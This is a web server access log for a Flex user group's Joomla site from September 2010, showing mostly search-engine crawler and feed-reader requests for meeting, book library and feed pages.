66.249.71.246 - - [07/Sep/2010:19:39:01 -0700] "GET /index.php?option=com_content&view=article&id=133:jan-8th-meeting-papervision-3d&catid=70:meeting-information&Itemid=60 HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
207.46.13.91 - - [07/Sep/2010:19:39:50 -0700] "GET /index.php?option=com_content&view=section&layout=blog&id=8&Itemid=53&fontstyle=f-larger HTTP/1.1" 200 547 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 
65.52.108.59 - - [07/Sep/2010:19:40:24 -0700] "GET /index.php?option=com_content&view=category&layout=blog&id=70&Itemid=60&fontstyle=f-default HTTP/1.1" 200 547 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 
66.249.71.246 - - [07/Sep/2010:19:49:56 -0700] "GET /index.php?option=com_booklibrary&task=view&id=45&catid=65&Itemid=56 HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
207.46.13.95 - - [07/Sep/2010:19:55:23 -0700] "GET /index.php?option=com_alfcontact&Itemid=64 HTTP/1.1" 200 547 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 
174.36.241.156 - - [07/Sep/2010:19:55:46 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2766 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.19; aggregator:Spinn3r (Spinn3r 3.1); http://spinn3r.com/robot) Gecko/2010040121 Firefox/3.0.19" 
66.249.71.246 - - [07/Sep/2010:20:03:09 -0700] "GET /index.php?option=com_booklibrary&task=view&id=30&catid=66&Itemid=56&fontstyle=f-default HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
77.88.42.25 - - [07/Sep/2010:20:03:22 -0700] "GET /index.php?option=com_booklibrary&task=view&id=17&catid=64&Itemid=56&fontstyle=f-larger HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
207.46.13.139 - - [07/Sep/2010:20:05:52 -0700] "GET /index.php?option=com_content&view=category&layout=blog&id=67&Itemid=61&fontstyle=f-larger&limitstart=10 HTTP/1.1" 200 547 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 
72.14.199.80 - - [07/Sep/2010:20:10:09 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2803 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 2 subscribers; feed-id=16173001225493754212)" 
89.178.182.107 - - [07/Sep/2010:20:10:56 -0700] "GET /index.php HTTP/1.0" 200 505 "http://www.seaflexug.org/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" 
66.249.71.196 - - [07/Sep/2010:20:17:45 -0700] "GET /index.php?option=com_content&view=category&id=74&Itemid=76&fontstyle=f-smaller HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
72.14.199.80 - - [07/Sep/2010:20:21:40 -0700] "GET /blog?format=feed&type=rss HTTP/1.1" 404 491 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=17205210357194660069)" 
72.14.199.80 - - [07/Sep/2010:20:23:33 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 2081 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 4 subscribers; feed-id=15539856829387087850)" 
77.88.42.25 - - [07/Sep/2010:20:28:10 -0700] "GET /index.php HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
77.88.42.25 - - [07/Sep/2010:20:44:46 -0700] "GET /index.php?option=com_booklibrary&task=showCategory&catid=66&Itemid=56&limitstart=10 HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
72.14.199.193 - - [07/Sep/2010:20:48:08 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 2069 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=12972516030749612519)" 
174.36.241.149 - - [07/Sep/2010:20:55:51 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2766 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.19; aggregator:Spinn3r (Spinn3r 3.1); http://spinn3r.com/robot) Gecko/2010040121 Firefox/3.0.19" 
38.113.234.180 - - [07/Sep/2010:20:56:39 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 2025 "-" "Voyager/1.0" 
67.195.111.232 - - [07/Sep/2010:21:01:05 -0700] "GET /index.php?option=com_content&view=article&id=46&Itemid=41&fontstyle=f-default HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 
77.88.42.25 - - [07/Sep/2010:21:09:36 -0700] "GET /index.php?option=com_content&view=category&layout=blog&id=70&Itemid=60&limitstart=10 HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
72.14.199.80 - - [07/Sep/2010:21:15:27 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2803 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 2 subscribers; feed-id=16173001225493754212)" 
77.88.42.25 - - [07/Sep/2010:21:26:08 -0700] "GET /index.php?option=com_booklibrary&task=view&id=60&catid=65&Itemid=56&fontstyle=f-default HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
207.46.199.179 - - [07/Sep/2010:21:26:43 -0700] "GET /robots.txt HTTP/1.1" 200 605 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 
76.104.161.63 - - [07/Sep/2010:21:27:38 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2803 "-" "BlogBridge 6.7 (http://www.blogbridge.com/) 1.6.0_21" 
72.14.199.80 - - [07/Sep/2010:21:28:03 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 2081 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 4 subscribers; feed-id=15539856829387087850)" 
76.104.161.63 - - [07/Sep/2010:21:28:05 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2803 "-" "BlogBridge 6.7 Discoverer (http://www.blogbridge.com/) 1.6.0_21" 
212.227.29.195 - - [07/Sep/2010:21:42:20 -0700] "GET / HTTP/1.0" 200 505 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.3.3; http://www.majestic12.co.uk/bot.php?+)" 
77.88.42.25 - - [07/Sep/2010:21:42:39 -0700] "GET /index.php?option=com_booklibrary&task=view&id=31&catid=66&Itemid=56&fontstyle=f-larger HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
72.14.199.193 - - [07/Sep/2010:21:54:37 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2783 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=6223356482245172981)" 
72.14.199.80 - - [07/Sep/2010:21:55:24 -0700] "GET /index.php?option=com_idoblog&view=idoblog&Itemid=80&format=feed&type=rss HTTP/1.1" 404 1274 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=8774138234779298844)" 
174.36.241.148 - - [07/Sep/2010:21:55:59 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2766 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.19; aggregator:Spinn3r (Spinn3r 3.1); http://spinn3r.com/robot) Gecko/2010040121 Firefox/3.0.19" 
72.14.199.80 - - [07/Sep/2010:21:57:51 -0700] "GET /blog/rss.cfm?mode=full HTTP/1.1" 404 496 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=6873439543726112842)" 
77.88.42.25 - - [07/Sep/2010:21:59:12 -0700] "GET /index.php?option=com_gcalendar&view=gcalendar&Itemid=62&fontstyle=f-default HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
77.88.42.25 - - [07/Sep/2010:22:07:28 -0700] "GET /index.php?option=com_booklibrary&task=view&id=60&catid=65&Itemid=56&fontstyle=f-larger HTTP/1.1" 200 546 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
193.189.143.42 - - [07/Sep/2010:22:12:02 -0700] "GET / HTTP/1.1" 200 491 "-" "Netvibes (http://www.netvibes.com/; 2 subscribers; feedID: 1979770)" 
77.88.42.25 - - [07/Sep/2010:22:15:58 -0700] "GET /index.php?option=com_content&view=article&id=71:august-14th-meeting-cairngorm&catid=70:meeting-information&Itemid=60 HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
72.14.199.80 - - [07/Sep/2010:22:16:26 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2803 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 2 subscribers; feed-id=16173001225493754212)" 
72.14.199.80 - - [07/Sep/2010:22:20:36 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 2081 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 4 subscribers; feed-id=15539856829387087850)" 
77.88.42.25 - - [07/Sep/2010:22:24:26 -0700] "GET /index.php?option=com_booklibrary&task=view&id=56&catid=63&Itemid=56&fontstyle=f-larger HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
67.195.111.232 - - [07/Sep/2010:22:32:12 -0700] "GET /index.php?option=com_alfcontact&Itemid=64&fontstyle=f-larger HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 
77.88.42.25 - - [07/Sep/2010:22:41:23 -0700] "GET /index.php?option=com_content&view=article&id=165:july-9th-meeting-getting-dirty-with-the-flex-sdk&catid=70:meeting-information&Itemid=60 HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
38.113.234.181 - - [07/Sep/2010:22:49:07 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 2025 "-" "Voyager/1.0" 
77.88.42.25 - - [07/Sep/2010:22:49:51 -0700] "GET /index.php?option=com_booklibrary&task=view&id=20&catid=62&Itemid=56 HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
184.73.62.73 - - [07/Sep/2010:22:51:13 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 2025 "-" "PostRank/2.0 (postrank.com; 1 subscribers)" 
67.195.111.232 - - [07/Sep/2010:22:53:49 -0700] "GET /index.php?option=com_booklibrary&task=showCategory&catid=63&Itemid=56 HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 
207.46.199.40 - - [07/Sep/2010:22:55:38 -0700] "GET /robots.txt HTTP/1.1" 200 605 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 
174.36.241.148 - - [07/Sep/2010:22:56:05 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2766 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.19; aggregator:Spinn3r (Spinn3r 3.1); http://spinn3r.com/robot) Gecko/2010040121 Firefox/3.0.19" 
66.249.71.196 - - [07/Sep/2010:22:57:14 -0700] "GET /index.php?option=com_gcalendar&task=event&eventID=%7BeventPlace%7D&calendarName=SeaFlex&ctz=%7BctzPlace%7D&fontstyle=f-default HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
77.88.42.25 - - [07/Sep/2010:23:06:47 -0700] "GET /index.php?option=com_user&view=reset&fontstyle=f-smaller HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
72.14.199.80 - - [07/Sep/2010:23:19:17 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2803 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 2 subscribers; feed-id=16173001225493754212)" 
72.14.199.80 - - [07/Sep/2010:23:21:41 -0700] "GET /blog?format=feed&type=rss HTTP/1.1" 404 491 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=17205210357194660069)" 
72.14.199.80 - - [07/Sep/2010:23:22:30 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 2081 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 4 subscribers; feed-id=15539856829387087850)" 
77.88.42.25 - - [07/Sep/2010:23:23:45 -0700] "GET /index.php?option=com_content&view=article&id=91:bio-bernd-paradies&catid=67:presenters&Itemid=61 HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
207.46.199.177 - - [07/Sep/2010:23:30:27 -0700] "GET /robots.txt HTTP/1.1" 200 605 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 
77.88.42.25 - - [07/Sep/2010:23:32:13 -0700] "GET /index.php?option=com_content&view=section&layout=blog&id=8&Itemid=53&limitstart=10&fontstyle=f-smaller HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
220.181.94.215 - - [07/Sep/2010:23:34:19 -0700] "GET / HTTP/1.1" 200 510 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 
207.46.199.40 - - [07/Sep/2010:23:34:21 -0700] "GET /index.php?option=com_content&view=article&id=71:august-14th-meeting-cairngorm&catid=70:meeting-information&Itemid=60 HTTP/1.1" 200 547 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 
77.88.42.25 - - [07/Sep/2010:23:40:41 -0700] "GET /index.php?option=com_booklibrary&task=view&id=6&catid=64&Itemid=56&fontstyle=f-default HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
124.115.6.12 - - [07/Sep/2010:23:45:55 -0700] "GET /robots.txt HTTP/1.1" 200 469 "-" "Sosospider+(+http://help.soso.com/webspider.htm)" 
72.14.199.193 - - [07/Sep/2010:23:46:07 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 2069 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 1 subscribers; feed-id=12972516030749612519)" 
95.65.77.99 - - [07/Sep/2010:23:51:42 -0700] "GET /index.php HTTP/1.0" 200 505 "http://seaflexug.org/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MyIE2; Deepnet Explorer)" 
174.37.205.85 - - [07/Sep/2010:23:56:07 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2766 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.19; aggregator:Spinn3r (Spinn3r 3.1); http://spinn3r.com/robot) Gecko/2010040121 Firefox/3.0.19" 
77.88.42.25 - - [07/Sep/2010:23:57:42 -0700] "GET /index.php?option=com_content&view=article&id=92:september-11th-meeting-switchboard-and-patchpanel&catid=70:meeting-information&Itemid=60 HTTP/1.1" 200 546 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
72.14.199.80 - - [08/Sep/2010:00:12:33 -0700] "GET /index.php?format=feed&type=atom HTTP/1.1" 200 2803 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 2 subscribers; feed-id=16173001225493754212)" 
207.46.199.55 - - [08/Sep/2010:00:16:06 -0700] "GET /robots.txt HTTP/1.1" 200 605 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 
77.88.42.25 - - [08/Sep/2010:00:17:46 -0700] "GET /index.php?option=com_content&view=section&layout=blog&id=8&Itemid=53&fontstyle=f-smaller&limitstart=15 HTTP/1.1" 200 547 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" 
72.14.199.80 - - [08/Sep/2010:00:19:37 -0700] "GET /index.php?format=feed&type=rss HTTP/1.1" 200 2081 "-" "Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 4 subscribers; feed-id=15539856829387087850)" 
66.249.71.196 - - [08/Sep/2010:00:19:38 -0700] "GET /robots.txt HTTP/1.1" 200 469 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
66.249.71.196 - - [08/Sep/2010:00:19:38 -0700] "GET /index.php?option=com_booklibrary&task=view&id=6&catid=64&Itemid=55&fontstyle=f-larger HTTP/1.1" 200 546 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 
91.212.226.246 - - [08/Sep/2010:00:22:43 -0700] "GET /index.php HTTP/1.0" 200 505 "http://www.seaflexug.org/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Media Center PC"